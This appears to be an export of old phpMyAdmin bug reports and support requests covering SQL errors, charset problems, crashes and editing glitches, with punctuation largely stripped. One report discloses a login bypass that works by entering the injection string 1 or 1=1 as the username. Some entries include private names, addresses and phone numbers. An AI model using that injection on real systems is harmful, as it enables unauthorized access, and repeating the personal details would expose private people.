Elsenstraat 16 , 5554 TD , Valkenswaard , 040 2042854 , NULL, NULL, 0 , Normaal , NULL, NULL), 2, Brian van Kessel , Pater v.d.
Elsenstraat 16 , 5554 TD , Valkenswaard , 040 2042854 , 1986 08 14 , 20050428 , 12 , Normaal , 19 20 , NULL), rest of sql removed SQL query Gegevens worden uitgevoerd voor tabel `zwemmers` INSERT DELAYED IGNORE INTO `zwemmers` `deelnr`, `naam`, `adres`, `postcode`, `woonpl`, `telf`, `birth`, `aangemeld`, `medail`, `medalsrt`, `tydhhmm`, `bewerk`) VALUES 1, Ton van Kessel , Pater v.d.
Elsenstraat 16 , 5554 TD , Valkenswaard , 040 2042854 , NULL, NULL, 0 , Normaal , NULL, NULL), rest of sql removed MySQL retourneerde 1064 Er is iets fout in de gebruikte syntax bij in regel 83 I exported table data, changed the table configuration so the fields became bigger again and imported the script.
Above was the result.
Original URL https sourceforge.net p phpmyadmin support requests 896 https sourceforge.net p phpmyadmin support requests 896 Original author mbch331","bug"
"24444","2726","Should allow character sets result = NULL.
Currently, PHPMyAdmin doesn t allow specifying SET character set result = NULL PHPMyAdmin allows setting of Connection collation which affects also character set result AFAIK.
But there are many in Europe mainly Czech Republic and other states using diacritics) badly configured servers which just blindly create databases with latin1 swedish ci collation.
Dumping exporting) data in different character set from these databases is PAIN and is not possible in PHPMyAdmin, because there is no way to set character set results = NULL I think this bug is critical as more and more servers are moving to MySQL gt;=4.1 Original URL https sourceforge.net p phpmyadmin support requests 897 https sourceforge.net p phpmyadmin support requests 897 Original author medousek","bug"
"24444","2727","PMA creates an incorrect UPDATE query.
When editing an existing record in a databasetable, PMA creates an incorrect update query SQL query Edit UPDATE `fv language` SET `code` = Array de ), `sortorder` = 3 WHERE `languageid` =3 LIMIT 1 MySQL said Documentation 1305 FUNCTION db1 elger.Array does not exist When it should have been UPDATE `fv language` SET `sortorder` = 3 ) WHERE `languageid` =3 LIMIT 1 I ve tried this on PMA 2.7.0 pl2, 2.8.2.1 and 2.8.2.2 I ve tried the Englisch language and Dutch I ve installed Zend Optimizer v3.0.1 Still the same result... PHP version 5.1.3 MySQL version 5.0.22 Apache 2.0 PHP configure options .
configure with apxs2= usr local apache2 bin apxs with mysql with mysqli= usr bin mysql config with zlib Original URL https sourceforge.net p phpmyadmin support requests 940 https sourceforge.net p phpmyadmin support requests 940 Original author elgerelger","bug"
"24444","2728","No tables visible.
Hi !
I ve a very strange effect with phpMyadmin 2.8.8.2.
Phpmyadmin shows on the left side the correct list of databases an the correct number of tables, but when i select one of the DB s e.g.
Click on DB test 1)) i got the message Es wurden keine Tabellen in der Datenbank gefunden No Tables found.
This affects all Users even root) and all Databases.
But when I enter SHOW Tables , everything looks ok. My Configuration PHPMyadmin 2.8.8.2, MySQL Client Version 4.1.10a PHP 5.1.4 Configure Parameter .
configure with apxs2= usr local apache2 bin apxs with mysql with config file scan dir= etc enable bcmath enable calendar with bz2= usr bin with mysql= usr local mysql with gd enable gd native ttf with zlib dir= usr lib enable exif with libjpeg with jpeg dir= usr with libpng with png dir= usr bindir= usr bin libdir= usr lib enable sockets enable pcntl running on Apache 2.2 My MySQL Server is on a different machine, MySQL Version is 5.1.9 beta regards, Gregor Original URL https sourceforge.net p phpmyadmin support requests 942 https sourceforge.net p phpmyadmin support requests 942 Original author verex rex Found in version 2.8.2.2","bug"
"24444","2729","Interface Interaction patches.
I ve been using phpmyadmin for ages, and love the software.
Recently I ve been dealing with 800 field tables there are that many unqiue fields) and the static HTML phpMyAdmin creates makes it painfull to use for quick changes.
I could split them into many tables, but it makes the coding locking overly complex... Before I start off on my own and produce a set of patches for a reduced ui, is there a project interest underway I should could join up with?
Mostly it ll be patches to use javascript for an interactive manipulation of content, instead of defaulting to showing all the fields by default.
I m thinking some simple JS and JSON should make it work pretty cleanly as it ll only adjust HTML output, and generate the same form input.
Original URL https sourceforge.net p phpmyadmin support requests 898 https sourceforge.net p phpmyadmin support requests 898 Original author mpcmtech","bug"
"24444","2730","Create timestamp field generate a wrong filed.
When I let run this script, then the field StatusDate becomes other properties.
CREATE TABLE IF NOT EXISTS `test01` `ID` int 11) NOT NULL AUTO INCREMENT, `StatusDate` TIMESTAMP NOT NULL, PRIMARY KEY `ID`) ) TYPE=InnoDB COMMENT= Test01 AUTO INCREMENT=1; After this command the table looks like this CREATE TABLE IF NOT EXISTS `test01` `ID` int 11) NOT NULL AUTO INCREMENT, `StatusDate` TIMESTAMP NOT NULL DEFAULT CURRENT TIMESTAMP ON UPDATE CURRENT TIMESTAMP, PRIMARY KEY `ID`) ) TYPE=InnoDB COMMENT= Test01 AUTO INCREMENT=1; Also there are too many propertiers in the table DEFAULT CURRENT TIMESTAMP ON UPDATE CURRENT TIMESTAMP ?
Can you correct this mistake?
Thank you very much.
MM Original URL https sourceforge.net p phpmyadmin support requests 899 https sourceforge.net p phpmyadmin support requests 899 Original author mmvisual","bug"
"24444","2731","cascading.
I was just wondering if phpmyadmin could graphically support the ON DELETE CASCADE and similar constraints on the databases that would be great add on ......
I am not sure but I am trying phpcodegenie, a very good software for CURD operations with Mysql and php and it is based on the string manipulation.
If you guys would take some idea from that software and design a sentance which has drop down menus to write sql query that would be helpful.... for example I want lt;primary key gt; in lt;table1 gt; to be linked to the lt;foreign key gt; in lt;table2 gt; with constraints lt;on update cascade gt;.
imagine contents between lt;........ gt; replaced with dropdown menus with options...........
I am not sure if there is a way to do it in current phpmyadmin version.
I will appriciate any inputs..... G L Jaimin Original URL https sourceforge.net p phpmyadmin support requests 900 https sourceforge.net p phpmyadmin support requests 900 Original author jxxxx","bug"
"24444","2732","Query lost when modified.
In the SQL window Click Modify .
Modify the SQL query the execute it.
Click Modify again.
The modified query is shown shortly then destroyed and replace by SELECT FROM `mytable` WHERE 1 .
Original URL https sourceforge.net p phpmyadmin support requests 902 https sourceforge.net p phpmyadmin support requests 902 Original author filip1258","bug"
"24444","2733","query dbs on different servers.
Hi is it possible to query two tables on different servers and on different dbs within the same sql query.
Something like the following select from server1.db1.tbluser tu1, server2.db2.tbluser tu2 where tu1.user pk = tu2.user pk; Thanks, JMT Original URL https sourceforge.net p phpmyadmin support requests 903 https sourceforge.net p phpmyadmin support requests 903 Original author tetreault","bug"
"24444","2734","Cannot log in to phpMyadmin.
My site is on yahoo geocities pro.
The first time I installed phpmyadmin, it worked fine.
However, when I tried to set up my forum, the forum couldn t find the database I set up.
Then, a few days later, when I hadn t even touched phpmyadmin, I started getting this message when I tried to log in 1045 Access denied for user root localhost using password YES) I was working with a friend of mine, but neither of us could figure out the problem.
I ve tried the only things I could think of, considering I don t know what the hell I m doing, which was upgrading and then uninstalling and then reinstalling.
Nothing helped, and I m completely lost.
Original URL https sourceforge.net p phpmyadmin support requests 904 https sourceforge.net p phpmyadmin support requests 904 Original author zira","bug"
"24444","2735","INNODB index undefined while relating FK.
After I made an index UNIQUE) on a field lt;fieldname gt; and related it to a PRIMARY key lt;fieldname gt; in another table in the same db, I keep getting No index defined!
lt;fieldname gt; My config, see http www.meavita thuis.nl phpinfo.php Preconditons PMA tables loaded via create tables.sql script file in phpMyAdmin 2.6.2 pl1 PMA history lacks, other are available.
All steps taken according to book Mastering phpMyAdmin for effective MySQL maangement , multiuser setup.
PMA table in phpmyAdmin db of type myISAM, user tables of type INNODB.
I did not manage to store any relation in the PMA tables, where I did succeed in doing this on a myISAM based local version of phpMyAdmin 2.5.7 pl1) and my PMA user on the target sercer has these rights in mysql SHOW GRANTS not in mysql 4.0.23) see attached picture.
MY QUESTIONS 1) Is it OK that PMA history lacks in phpmyAdmin database with 2.6.2 pl1?
And if not, does it have direct effect on the error report?
2) What might be the solution the problem that phpMyAdmin doesnxe2x80x99t recognize the indexes.
Original URL https sourceforge.net p phpmyadmin support requests 906 https sourceforge.net p phpmyadmin support requests 906 Original author vondeken Found in version 2.6.2 pl1","bug"
"24444","2736","SQL Cron Job using phpMyAdmin?.
How would it be possible to automaticly set off trigger a certain stored) SQL command every 4 hours in mysql 4.0.23 that calculates the values of certain statusfield using other datetime fields and the sysdate ) in one table.
Triggers are not available in mysql 4.0.23, but I am looking for a clever workaround on a remote shared host.
Any suggestions?
Cheers, Henk Original URL https sourceforge.net p phpmyadmin support requests 907 https sourceforge.net p phpmyadmin support requests 907 Original author vondeken Found in version 2.6.2 pl1","bug"
"24444","2737","No Privilages, no phpbb, 2.6.3 pl1.
I m new to the database and Mysql thing Problem 1 No privilages I get this message Warning Your privilege table structure seem to be older than this MySQL version!
Please run the script mysql fix privilege tables that should be included in your MySQL server distribution to solve this problem!
I dont have this script, I can t find it...dont know what to do with it when I get it.
Problem 2 I want to install phpbb but I have no clue what to fill in specifically) in the following fields Database Server Hostname DSN Your Database Name Problem 3 I don t know if this is a problem but up above for the pull down for the group it did not list what my MYsql says it is Welcome to phpMyAdmin 2.6.3 pl1 Please help.
Original URL https sourceforge.net p phpmyadmin support requests 909 https sourceforge.net p phpmyadmin support requests 909 Original author eclectik Found in version 2.6.3 rc1","bug"
"24444","2738","Generating incorrect export code?.
Hello, I am trying to move a couple tables over to a different database, so first I went and exported the tables I wanted to move, and it gave me this code moved to attachment ).
OKay, so I saved this as database.sql.
Now, I go to the place where I want to import all this, and do the usual.
I click on the import tab, browse for the file, and click go .
After clicking go, I get this error message Error message starts here Error SQL query xefxbbxbf phpMyAdmin SQL Dump version 2.8.1 http www.phpmyadmin.net Host localhost Generation Time Sep 03, 2006 at 04 57 AM Server version 4.0.23 PHP Version 4.4.0 Database `galacticwebdesigns com 2` Table structure for table `wiki archive` DROP TABLE IF EXISTS `wiki archive` ; MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near xc3xafxc2xbbxc2xbf DROP TABLE IF EXISTS `wiki archive` at line 1 error message ends here Im guessing that it is creating the wrong export code for some reason.
.
.
.
.
I really have know idea, but I need this problem fixed ASAP.
Thanks, Austin Original URL https sourceforge.net p phpmyadmin support requests 952 https sourceforge.net p phpmyadmin support requests 952 Original author wvcaudill2 Found in version 2.8.1 Attachment http sourceforge.net p phpmyadmin support requests 952 attachment galacticwebdesigns com 2.sql http sourceforge.net p phpmyadmin support requests 952 attachment galacticwebdesigns com 2.sql","bug"
"24444","2739","Multiple problems with privileges.
Through many versions of MySQL and phpMyAdmin, I ve had problems with privileges.
My current phpMyAdmin version is reported as 2.8.0.3, which isn t offered in the bug reporter s Group field.)
Latest manifestation I can t delete users.
Trying to delete a user results in the user s privileges being removed, then I get an error message MySQL said 1268 Can t drop one or more of the requested users and clicking the little ?
bubble takes me to a totally blank page at http dev.mysql.com doc refman 4.1 en error handling.html) I am logged in as root when I try this.
Possible problem I have two root users defined, one with localhost as the host, and the other with myservername.lan as the host.
myservername.lan is defined in my local DNS and points to the same box as localhost .
But since I can t remove users, I can t fix this.
Also, when I try to log out, I get a username password dialog saying to view this page, you need to log into area xe2x80x9cphpMyAdmin running on QuickSilver at Frog Hillxe2x80x9d on www.frog hill.net.
I don t know where this message is coming from, but it seems odd that I should have to log in before logging out!
And if I put in my root name and password, they re rejected!
The only way I can escape is to close the browser window.
If I click the ?
bubble next to Logout , I m sent here http www.frog hill.net phpMyAdmin Documentation.html login bug but don t see anything about a login bug .
Using Mac OS X Server, 10.4.6.
Original URL https sourceforge.net p phpmyadmin support requests 911 https sourceforge.net p phpmyadmin support requests 911 Original author roblewis Found in version 2.8.1","bug"
"24444","2740","mysqli extension does not work in 2.8.2 and latest CVS.
On an x86 64 Fedora Core 4 server, running the following packages php devel 5.0.4 10.5 php mbstring 5.0.4 10.5 php 5.0.4 10.5 php mysql 5.0.4 10.5 mysql server 4.1.20 1.FC4.1 mysql devel 4.1.20 1.FC4.1 mysql 4.1.20 1.FC4.1 When I use the mysqli extension, I get No databases in the left pane and the following output in the right pane Error SQL query Documentation SELECT USER ) ; MySQL said Documentation 1065 Query was empty This happens with latest CVS and with 2.8.2. phpinfo ) gives the following info about the mysql and mysqli extensions mysql MySQL Support enabled Active Persistent Links 0 Active Links 0 Client API version 4.1.20 MYSQL MODULE TYPE external MYSQL SOCKET var lib mysql mysql.sock MYSQL INCLUDE I usr include mysql MYSQL LIBS L usr lib64 mysql lmysqlclient Directive Local Value Master Value mysql.allow persistent On On mysql.connect timeout 60 60 mysql.default host no value no value mysql.default password no value no value mysql.default port no value no value mysql.default socket no value no value mysql.default user no value no value mysql.max links Unlimited Unlimited mysql.max persistent Unlimited Unlimited mysql.trace mode Off Off mysqli MysqlI Support enabled Client API version 4.1.20 MYSQLI SOCKET var lib mysql mysql.sock Directive Local Value Master Value mysqli.default host no value no value mysqli.default port 3306 3306 mysqli.default pw no value no value mysqli.default socket no value no value mysqli.default user no value no value mysqli.max links Unlimited Unlimited mysqli.reconnect Off Off Original URL https sourceforge.net p phpmyadmin support requests 914 https sourceforge.net p phpmyadmin support requests 914 Original author kayvan Found in version Latest Git snapshot","bug"
"24444","2741","Export shows Javascript when using a SQL query with LIMIT.
I performed a SQL query, and actually typed in my own LIMIT parameters this is different than the ones that are shown in phpMyAdmin used for pagination).
I did a LIMIT 0,3700 to show the first 3700 rows of results because that s what I wanted to export.
I forgot you could set the parameters in the export.
Anyway, when I went to export, my Save as prompt box said something like export.csv with the little Firefox icon, indicating an HTML file, plus it had Open as Firefox default) Excel was still a listed option though.
I just left it at Firefox, and surprisingly it opened in Excel probably due to the .CSV extension) but the results were a ton of JavaScript and not the data that I wanted.
I then re did the query with no LIMIT, and specified that the export do 3700 rows starting at row 0, and this time the Excel icon showed next to export.csv and when it opened, it showed all my data as it should have.
This leads me to believe there s something wrong with exporting data when LIMIT is in the SQL.
BTW I tried both CSV and CSV for MS Excel Original URL https sourceforge.net p phpmyadmin support requests 915 https sourceforge.net p phpmyadmin support requests 915 Original author crownoflife Found in version 2.6.2","bug"
"24444","2742","Missing edit delete buttons.
After upgrading to 2.8.2 I no longer see the edit or delete buttons beside each row while browsing a table.
It doesn t matter which of the thousands of databases and or tables I try, whether they have indexes or not, or whether I log in as an end user or root .
I get the same thing with a 4.0.27 server, a 4.1.20 server, and a 5.0.22 server.
The phpMyAdmin installation is using the MySQL 4.1.20 client library.
Unlike some similar reports from way back, there are no question marks or anything else.
The buttons and the column they should be in simply aren t displayed.
This was fine yesterday befor upgrading phpMyAdmin.
Mark Original URL https sourceforge.net p phpmyadmin support requests 917 https sourceforge.net p phpmyadmin support requests 917 Original author mmorley","bug"
"24444","2743","mb internal encoding euc kr ) function disable.
my browser encoding is euc kr .
ERROR libraries string.lib.php file 41 Line.
Original URL https sourceforge.net p phpmyadmin support requests 918 https sourceforge.net p phpmyadmin support requests 918 Original author chaeya","bug"
"24444","2744","Incorrectly shows text stored via non UTF encoding.
This is valid for version 2.7.x as well which is missing from the group dropdown in the bug posting) SHORT DESCRIPTION When text is stored in MySQL database in non UTF non English character set, it cannot show correctly with phpMyAdmin v. 2.7.x or 2.8.x shows garbage or ???
instead of the actual original characters).
LONG DESCRIPTION THE SCENARIO MySQL is installed by default with character set latin1 en iso 8859 1 , aka West European latin1) One can store text in ANY OTHER language with this charset do not get confused by West European or latin here.
Until recently still valid for most web sites), the default and most used way to show non English characters on a web page was to use a language specific HTML encoding, e.g.
Windows 1251 as opposed to the universal one, UTF.
Before logging to phpMyAdmin, you can choose between a non UTF and UTF language for almost) EVERY language.
So let s say we choose Bulgarian win1251) .
The page correctly changes to Bulgarin translation of phpMyAdmin.
The web page encoding on your browser, e.g.
Firefox View Character Encoding) is correctly set to Cyrillic Windows 1251) .
Now we log on.
We still see the webpages correctly translated in the chosen language Bulgarian.
But when we check the web page encoding again surprise!!!
It has changed to UTF 8 !!!
We still have on the main phpMyAdmin page, at the right a drop down for Language , but it now shows only ONE choice for language, and it is the UTF 8 encoding for EACH one of them.
THE PROBLEM =========== So where is the poblem with this, would one wonder.
Here If you stored NON ENGLISH language text data in the database which by default is set with latin1 character set) and try to see the text via phpMyAdmin, you cannot see the correct characters.
You see correctly the latin1 character set representation of the non latin characters.
Usually such problem is fixed by switching the web browser s encoding to the one matching the data, e.g Cyrillic Windows 1251 ).
This does NOT work though it produces garbage both for the page captions, and for the data we are trying to view.
WHERE IS THE PROBLEM ===================== 1\.
phpMyAdmin developers assume the MySQL data was stored as UTF charset they don t offer you choice for non UTF language AFTER you log on.
If you stored NON ENGLISH characters in the database, you cannot see them at all, no matter what combinations you try to choose.
2\.
Even if phpMyAdmin web pages encoding is set manually to the desired one e.g.
Windows 1251 by enabling variable cfg[ Lang ] in config.inc.php) and setting it to bg win1251 , the stored text doesn t show correctly now every symbol shows as question mark ?
).
This is because gt; gt; gt; I definitely traced it with 100 certainty lt; lt; lt; lt; the developers assume that cfg[ Lang ] sets BOTH phpMyAdmin web pages encoding AND the MySQL character set the data is stored with.
THis can be found in libraries database interface.lib.php, look for the calls PMA DBI query ...) where it issues commands SET NAMES ... and SET CHARACTER SET ...
SUGGESTION TO THE DEVELOPERS HOW TO FIX ======================================== 1\.
Separate the web pages encoding from the MySQL character set the data is stored with.
Provide dropdown choice for the MySQL character set setting AFTER logging on now it assumes UTF 8).
2\.
Provide choice for NON UTF languages in the AFTER logon language dropdown you DO have all of them after all you do offer them before logging on?
Or are those different ?)
Original URL https sourceforge.net p phpmyadmin support requests 919 https sourceforge.net p phpmyadmin support requests 919 Original author kvguser Found in version 2.8.1","bug"
"24444","2745","Tutorial.
I would like to write a tutorial about phpmyadmin and the question is if i can use your documentation for that and from where I can download it.
The documentation is for my website.
If any one is interested in writing articles and tutorials please email at nueva nueva design.com.
Thank you for your time.
Original URL https sourceforge.net p phpmyadmin support requests 920 https sourceforge.net p phpmyadmin support requests 920 Original author foottuns Found in version 2.8.1","bug"
"24444","2746","Can t set BLOB fields to NULL.
When I submit edits to a row that has a BLOB field in it default NULL), the field always becomes empty string.
There is no NULL checkbox next to the field.
Original URL https sourceforge.net p phpmyadmin support requests 921 https sourceforge.net p phpmyadmin support requests 921 Original author rob263","bug"
"24444","2747","Images not showing.
Hello.
I have recently installed phpMyAdmin on my hosts web server and everything is working well except for the fact that none of the png images are showing on the screen.
All I get instead is an empty square in the place where any image should be.
Please see attached screen shot).
I have checked the .html code and it is pointing to the write directory file for the images so I am wondering whether the problem is related to the fact that the images are in .png format or is there something else I need to specify in the set up files.
Thanks in advance for your help.
Original URL https sourceforge.net p phpmyadmin support requests 922 https sourceforge.net p phpmyadmin support requests 922 Original author funmi","bug"
"24444","2748","Can t use Null check box.
When I use phpMyAdmin 2.9.0.2) there is a bug that prevents me from editing database records where the table has columns that takes null values.
The effect is that I can t set a column value to null for a database record.
The problem is a phpMyAdmin problem, but as I consider it a major problem, I thought that I should report it to cPanel.
To recreate this problem 1 Import the following to a MySQL database CREATE TABLE IF NOT EXISTS `fil file` `id` int 11) unsigned NOT NULL auto increment, `grp id` int 11) unsigned default NULL, `code` varchar 8) default NULL, `security level` enum H , M , L ) NOT NULL default M , `official name` varchar 255) default NULL, `internal name` varchar 255) NOT NULL default , `ref count` int 11) NOT NULL default 1 , `upload type` enum A , P , R ) default NULL, `mime type` varchar 32) NOT NULL default , `size` int 11) default NULL, `created at` datetime NOT NULL default 0000 00 00 00 00 00 , PRIMARY KEY `id`), KEY `grp id` `grp id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO INCREMENT=530 ; Dumping data for table `fil file` INSERT INTO `fil file` VALUES 82, 50, 507830b7 , M , F 6.doc , 2006 06 1 2006 06 08 b61ab485edce3aa6954ce6e0d3b2cec5 , 1, A , application msword , 29184, 2006 06 08 12 13 21 ); INSERT INTO `fil file` VALUES 83, 53, 762e82fb , M , Lusthusinfo v 48.pdf , 2006 06 1 2006 06 08 73141d995e48b63b1e920b98e3bd56ee , 1, A , application pdf , 344211, 2006 06 08 12 13 21 ); 2 Browse the table in phpMyAdmin 3 Click on the pen icon on the line with id=82.
4 Try to mark more than one check box in the Null column.
BUG 1.
When I do that, the check boxes behaves like radio boxes, i.e.
when I mark a second check box, the first marked box is unmarked.
5 Press the Reset button below the table to reset the input values.
6 Now mark one check box, go to the Go button and keep a mouse button pressed on the button don t release the mouse button).
BUG 2.
You can visually see that the marked box is unmarked at the same instant that you press the Go button.
7 Release the mouse button BUG 3.
A direct consequence of BUG 2).
The database record was updated, but not with a NULL value, but rather an empty string or 0, depending on the column type).
Original URL https sourceforge.net p phpmyadmin support requests 967 https sourceforge.net p phpmyadmin support requests 967 Original author vanbrayne","bug"
"24444","2749","Error when Updating Table Immediately After Creating Table.
Hello, I really don t have time to double test this error...
So someone else has to confirm it... but I think it is consistant...
Immediately after creating a table, add a field after any other field... You should get a num fields error... Jonathan Original URL https sourceforge.net p phpmyadmin support requests 969 https sourceforge.net p phpmyadmin support requests 969 Original author jonathanmchan","bug"
"24444","2750","Changing the user s password.
Sorry if this bug has already been reported, but I did not see it.
I m actually working with the last version of EasyPhp 1.8), that is to say with the version of phpMyAdmin 2.6.1.
Today, a friend made an awful use of my program and when he changed the user s password, he did not check any of the two radio buttons left side of the textfields for password).
The result is that the user could not connect after and it was the unique user, so I install EasyPhp and phpMyAdmin once again in order to find this bug).
I apologize for my very bad english, and I hope it will help you in your hard programming task.
Original URL https sourceforge.net p phpmyadmin support requests 970 https sourceforge.net p phpmyadmin support requests 970 Original author arnzousk","bug"
"24444","2751","PHP 5.2RC6 Segmentation faults MySQL 5.0.26, Apache 2.2.3).
Hello, I tried all current versions of phpMyAdmin 2.9 including subversion and utf8 only) with the current PHP 5.2RC6, running as an Apache 2.2.3 module, and MySQL 5.0.26 server and client) on SLES9, but all accesses to table structures result in Segmentation faults.
[notice] child pid 5462 exit signal Segmentation fault 11) Up to PHP 5.2RC4 everything worked flawlessly.
I am using a very basic config.inc.php and even tried to use the new pmadb feature, but it won t work.
I tried auth type=http together with the controluser and different combinations of connect type tcp and socket extension mysql and mysqli compress true and false.
I can login normally and the left database frame seems to be complete, but already the welcome content page shows only a fraction of the usual information and actions, even as root.
The single database structure view looks properly, too, but all table actions like structure or view result in a blank page because of the Segmentation faults.
I hope the PHP 5.2 compatibility will be fixed soon.
Keep up the good work, Renxc3xa9 Original URL https sourceforge.net p phpmyadmin support requests 971 https sourceforge.net p phpmyadmin support requests 971 Original author rele Found in version Latest Git","bug"
"24444","2752","Permit Anonymous login ?.
To reproduce against 2.8.2 with authentication in cookie mode, in the Username field enter 1 or 1=1 This lets you login without a password, with little to no permissions, depending how securely the mysql install was configured.
Additionally a non existing username should not login without specifying a password.
At the least the input fields on the login form should be checking user input for this type of thing, and stripping out the nasties, if not throughout the entire application.
Original URL https sourceforge.net p phpmyadmin support requests 925 https sourceforge.net p phpmyadmin support requests 925 Original author jon r johnson","bug"
"24444","2753","1045 Access denied for user.
Can someone help me figure out where this error message comes from?
Is this the web server, MySQL, or phpMyAdmin?
TIA Original URL https sourceforge.net p phpmyadmin support requests 975 https sourceforge.net p phpmyadmin support requests 975 Original author michaels23 Found in version Latest Git","bug"
"24444","2754","apache crashes with error 3221225477.
Hi, Just installed a fresh mysql 5.0.22, php 5.1.4, apache 2.0.58 and phpmyadmin 2.8.2.
When I connect to the DB and go to browse a table, apache crashes.
Here is the log snippet [Sat Jul 22 01 20 33 2006] [notice] Parent child process exited with status 3221225477 Restarting.
[Sat Jul 22 01 20 33 2006] [notice] Apache 2.0.58 Win32) PHP 5.1.4 configured resuming normal operations I m using Windows XP and the machine is AMD 64 3500 .
This crash only happens with phpmyadmin.
I m using a cookie based config with phpmyadmin.
Original URL https sourceforge.net p phpmyadmin support requests 927 https sourceforge.net p phpmyadmin support requests 927 Original author cifroes","bug"
"24444","2755","sql.php resets connection immediatly.
i ve got an issue with sql.php it closes the remote connection browser lt; gt; httpd) immediatly.
is this a known issue ?
this happened after i upgraded php 4.3.9 gt; 5.1.4) after that i upgraded phpmyadmin 2.6.0 gt; 2.8.2) but same error .. .
Tested so far with FF1.5 Konqi3.5.
Original URL https sourceforge.net p phpmyadmin support requests 928 https sourceforge.net p phpmyadmin support requests 928 Original author o190 Found in version 2.8.1","bug"
"24444","2756","blank page Mandriva x86 64).
My browser receive a blank page with pma 2.8.2 but is ok with pma 2.6.4 pl1 my configuration mandriva x86 64 apache 2.0.54 php 5.04 mysql 4.1.12 Original URL https sourceforge.net p phpmyadmin support requests 929 https sourceforge.net p phpmyadmin support requests 929 Original author jmdumont","bug"
"24444","2757","PHP Access Violation.
OS Windows XP SP2 mySQL 5.0.27 PHP 5.2.0 Browsing a table contents by pressing Browse icon result this error PHP has encountered an Access Violation at 02857BF0 A little debugging shows that the error is occurs in the file sqlparser.lib.php at line 1177.
Adding checking to this line eliminates the error add the table alias into the whole expression if subresult[ table ref ][ current table ref][ table alias ] != ) subresult[ table ref ][ current table ref][ expr ] .= .
subresult[ table ref ][ current table ref][ table alias ]; Original URL https sourceforge.net p phpmyadmin support requests 980 https sourceforge.net p phpmyadmin support requests 980 Original author kovacsi","bug"
"24444","2758","Strange editing behavior.
I am using phpMyAdmin 2.8.2 to edit some entries in a database and am generating odd behavior.
I select the edit button and try to change the value of a field and so far I have had 1 of 3 things happen.
33 of the time the edit works fine 33 of the time it generates an sql error 33 of the time it makes my edit but also replaces one or more of the other fields info with array for example Current database information fname mname lname address1 Joanne Polzien 317 Admin Building Vice President for Research Office camp aff phone Director of Research Compliance 487 2902 email jpolzien I try setting the mname to NA if it works the SQL generated is UPDATE `people` SET `mname` = NA WHERE CONVERT `fname` USING utf8 ) = Joanne AND CONVERT `mname` USING utf8 ) = AND CONVERT `lname` USING utf8 ) = Polzien AND CONVERT `address1` USING utf8 ) = 317 Admin Building AND CONVERT `address2` USING utf8 ) = Vice President for Research Office AND CONVERT `camp aff` USING utf8 ) = Director of Research Compliance AND CONVERT `phone` USING utf8 ) = 487 2902 AND CONVERT `email` USING utf8 ) = jpolzien LIMIT 1 ; but, I can also get this where the edit goes through but field s) are replace with the word Array.
UPDATE `people` SET `mname` = NA , `phone` = Array , `email` = Array WHERE CONVERT `fname` USING utf8 ) = Joanne AND CONVERT `mname` USING utf8 ) = HELP ME AND CONVERT `lname` USING utf8 ) = Polzien AND CONVERT `address1` USING utf8 ) = 317 Admin Building AND CONVERT `address2` USING utf8 ) = Vice President for Research Office AND CONVERT `camp aff` USING utf8 ) = Director of Research Compliance AND CONVERT `phone` USING utf8 ) = 487 2902 AND CONVERT `email` USING utf8 ) = jpolzien LIMIT 1 ; and the error that sometimes generated is UPDATE `people` SET `mname` = Array , `lname` = Array , `camp aff` = Director of Research Compliance , `phone` = Array Array ), `email` = Array WHERE CONVERT `fname` USING utf8 ) = Joanne AND CONVERT `mname` USING utf8 ) = AND CONVERT `lname` USING utf8 ) = Polzien AND CONVERT `address1` USING utf8 ) = 317 Admin Building AND CONVERT `address2` USING utf8 ) = Vice President for Research Office AND CONVERT `camp aff` USING utf8 ) = Director of Research Compliance AND CONVERT `phone` USING utf8 ) = 487 2902 AND CONVERT `email` USING utf8 ) = jpolzien LIMIT 1 MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near Array ), `email` = Array WHERE CONVERT `fname` USING utf8) = Joanne AND CO at line 1 Original URL https sourceforge.net p phpmyadmin support requests 930 https sourceforge.net p phpmyadmin support requests 930 Original author arliman","bug"
"24444","2759","amp in url instead of .
Hi, I see the phpMyAdmin on multiple servers shows the same mistake.
The url in the address bar is partially html encoded.
See example below.
The character is encoded to amp;amp; which is definitely wrong only the should be presented in the address bar).
https some domain phpMyAdmin ?lang=en iso 8859 1 amp;amp;convcharset=iso 8859 1 amp;amp;collation connection=utf8 unicode ci amp;amp;token=bc2cfd0d1f1182e121a18f8779b443c7 Martin Original URL https sourceforge.net p phpmyadmin support requests 934 https sourceforge.net p phpmyadmin support requests 934 Original author alikuvkoutek Found in version 2.8.1","bug"
"24444","2760","ALTER field of TEXT type cause other fields type changes.
I m using MySQL 5.0.22 If there are some TEXT type fields in the table, ALERT one of them, the others of TEXT type) will become MEDIUMTEXT type.
It s strange!
Maybe it s a bug of MySQL5 or phpMyadmin?
Original URL https sourceforge.net p phpmyadmin support requests 936 https sourceforge.net p phpmyadmin support requests 936 Original author zhangminfeng Found in version 2.8.2.1","bug"
"24444","2761","Please Add PHP 5 Support.
Please Add PHP 5 Support Original URL https sourceforge.net p phpmyadmin support requests 937 https sourceforge.net p phpmyadmin support requests 937 Original author hi tech guy 18","enhancement"
"24444","2762","smallint, mediumint, bigint.
insert max values for smallint, mediumint, bigint it s always 1 Original URL https sourceforge.net p phpmyadmin support requests 938 https sourceforge.net p phpmyadmin support requests 938 Original author flobee Found in version 2.8.2.1","bug"
"24444","2763","ini set ) warning in session.inc.php.
My setup phpMyAdmin 2.9.1.1 PHP 4.3.3 MySQL 4.0.20 max Apache 1.3.6 Solaris 8 I m getting the following warnings from a fresh phpMyAdmin install with no customization except for setting the database info in config.inc.php.
Warning ini set ) Unable to access a=href,frame=src,input=src,form=fakeentry,fieldset= in .
libraries session.inc.php on line 56 Warning Cannot modify header information headers already sent by output started at .
libraries session.inc.php 56) in .
libraries common.lib.php on line 2667 Warning Cannot modify header information headers already sent by output started at .
libraries session.inc.php 56) in .
libraries auth cookie.auth.lib.php on line 83 The first warning about ini set ) seems to be the culprit; if I comment that line out, it works fine.
Original URL https sourceforge.net p phpmyadmin support requests 987 https sourceforge.net p phpmyadmin support requests 987 Original author joeljkp","bug"
"24444","2764","phpmyadmin interface not displaying correctly.
Greetings.
I have apache 2.2.3, mysql5 and php5 installed on a windows server 2003 box.
The problem I am having is not with the functionality of the application, as it seems to work fine, but with the way it is displaying.
Everything seems a bit enlarged and the themes that I am used to seeing are not displaying properly.
A screenshot of what I m talking about is attached.
